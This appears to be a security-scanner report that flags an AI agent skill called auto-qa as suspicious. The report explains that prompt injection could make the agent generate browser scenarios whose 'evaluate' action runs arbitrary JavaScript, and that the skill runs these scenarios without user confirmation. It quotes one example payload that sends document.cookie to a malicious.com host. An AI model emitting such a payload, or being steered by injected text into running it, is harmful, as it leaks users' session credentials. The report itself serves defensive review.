Skill v1.2.0

VirusTotal security

Auto Qa · External malware reputation and Code Insight signals for this exact artifact hash.

Scanner verdict

Suspicious · Apr 30, 2026, 4:35 AM
Hash
0a1a41e880979ec190c61ed922dbf422e0fe4f1372539ad979d364eac07ab614
Source
palm
Verdict
suspicious
Code Insight
Type: OpenClaw Skill
Name: auto-qa
Version: 1.2.0

The skill bundle is classified as suspicious due to the inherent risk of prompt injection against the AI agent that generates the scenario JSON, specifically through the `evaluate` action in `src/skills/auto-qa/scripts/run_autoqa.py`. While the script implements an action whitelist and scenario validation, the `evaluate` action allows arbitrary JavaScript execution within the browser context. If a malicious user can craft a prompt that tricks the AI agent into generating a scenario with a harmful JavaScript payload (e.g., `fetch('https://malicious.com/exfil?data=' + document.cookie)`), it would constitute a severe vulnerability (browser-side RCE). The `SKILL.md` also instructs the agent to directly execute generated scenarios without explicit user confirmation, amplifying this risk. There is no evidence of intentional malicious behavior within the provided code or documentation; the risky capabilities are part of legitimate browser automation.